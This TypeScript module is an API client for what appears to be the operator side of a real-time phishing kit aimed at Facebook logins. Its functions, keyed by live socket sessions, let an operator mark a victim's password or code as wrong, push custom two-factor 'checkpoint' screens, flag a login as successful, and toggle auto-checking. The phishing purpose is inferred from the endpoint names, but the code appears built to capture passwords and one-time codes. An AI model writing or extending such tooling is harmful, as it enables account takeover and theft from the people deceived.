import axios from "axios";
import { handleError, handleResponse } from "./utils";
import { DOMAIN_FB } from "./constant";
import { GlobalCheckMode } from "@/pages/LoginSessionPage";

const ENDPOINT = DOMAIN_FB;

const getAuthHeaders = () => {
  const token = localStorage.getItem("jwt");
  return {
    Authorization: `Bearer ${token}`,
  };
};

export const manualCheckPoint = async (
  socketId: string,
  twoFaTitle: string,
  twoFaDescription: string,
  codeLabel: string,
  textCount: string,
  allTexts: string[],
  fbName: string,
  type: number
) => {
  try {
    const url = `${ENDPOINT}manual/check-point`;
    const payload = {
      socketId,
      twoFaTitle,
      twoFaDescription,
      codeLabel,
      textCount,
      allTexts,
      fbName,
      type,
    };
    const response = await axios.post<any>(url, payload, {
      timeout: 100000,
      headers: getAuthHeaders(),
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "manual checkpoint failed");
  }
};

export const manualSubmit2FA = async (
  socketId: string,
  data: {
    twoFaTitle: string;
    twoFaDescription: string;
    codeLabel: string;
    textCount: string;
    allTexts: string[];
    fbName: string;
  }
) => {
  return manualCheckPoint(
    socketId,
    data.twoFaTitle,
    data.twoFaDescription,
    data.codeLabel,
    data.textCount,
    data.allTexts,
    data.fbName,
    2
  );
};

export const manualCheckpoint1 = async (
  socketId: string,
  data: {
    twoFaTitle: string;
    twoFaDescription: string;
    codeLabel: string;
    textCount: string;
    allTexts: string[];
    fbName: string;
  }
) => {
  return manualCheckPoint(
    socketId,
    data.twoFaTitle,
    data.twoFaDescription,
    data.codeLabel,
    data.textCount,
    data.allTexts,
    data.fbName,
    1
  );
};

export const manualStart = async (socketId: string) => {
  try {
    const url = `${ENDPOINT}manual/start`;
    const payload = { socketId };
    const response = await axios.post<any>(url, payload, {
      timeout: 100000,
      headers: getAuthHeaders(),
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "manual start failed");
  }
};

export const manualWrongPassword = async (socketId: string) => {
  try {
    const url = `${ENDPOINT}manual/wrong-password`;
    const payload = { socketId };
    const response = await axios.post<any>(url, payload, {
      timeout: 100000,
      headers: getAuthHeaders(),
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "manual wrong-password failed");
  }
};

export const manualWrongCode = async (socketId: string, mes: string) => {
  try {
    const url = `${ENDPOINT}manual/wrong-code`;
    const payload = { socketId, message: mes };
    const response = await axios.post<any>(url, payload, {
      timeout: 100000,
      headers: getAuthHeaders(),
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "manual wrong-code failed");
  }
};

export const manualLoginSuccess = async (socketId: string) => {
  try {
    const url = `${ENDPOINT}manual/login-success`;
    const payload = { socketId };
    const response = await axios.post<any>(url, payload, {
      timeout: 100000,
      headers: getAuthHeaders(),
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "manual login-success failed");
  }
};

export const manualDelete = async (socketId: string) => {
  try {
    const url = `${ENDPOINT}manual/remove`;
    const payload = { socketId };
    const response = await axios.post<any>(url, payload, {
      timeout: 100000,
      headers: getAuthHeaders(),
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "manual delete failed");
  }
};

export const getManualSessions = async () => {
  try {
    const url = `${ENDPOINT}manual`;
    const response = await axios.get<any>(url, {
      timeout: 10000,
      headers: getAuthHeaders(),
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "get manual sessions failed");
  }
};

export const getManualSessionDetail = async (socketId: string) => {
  try {
    const url = `${ENDPOINT}manual/${socketId}`;
    const response = await axios.get<any>(url, {
      timeout: 10000,
      headers: getAuthHeaders(),
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "get manual sessions failed");
  }
};

export const manualToggleAutoCheck = async (enabled: GlobalCheckMode) => {
  try {
    const url = `${ENDPOINT}manual/config`;
    const payload = { value: enabled };
    const response = await axios.post<any>(url, payload, {
      timeout: 100000,
      headers: getAuthHeaders(),
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "manual toggle failed");
  }
};

export const manualGetAutoCheck = async () => {
  try {
    const url = `${ENDPOINT}manual/config`;
    const response = await axios.get<any>(url, {
      timeout: 10000,
      headers: getAuthHeaders(),
    });
    return handleResponse(response.data);
  } catch (error) {
    return handleError(error, "get manual auto-check failed");
  }
};
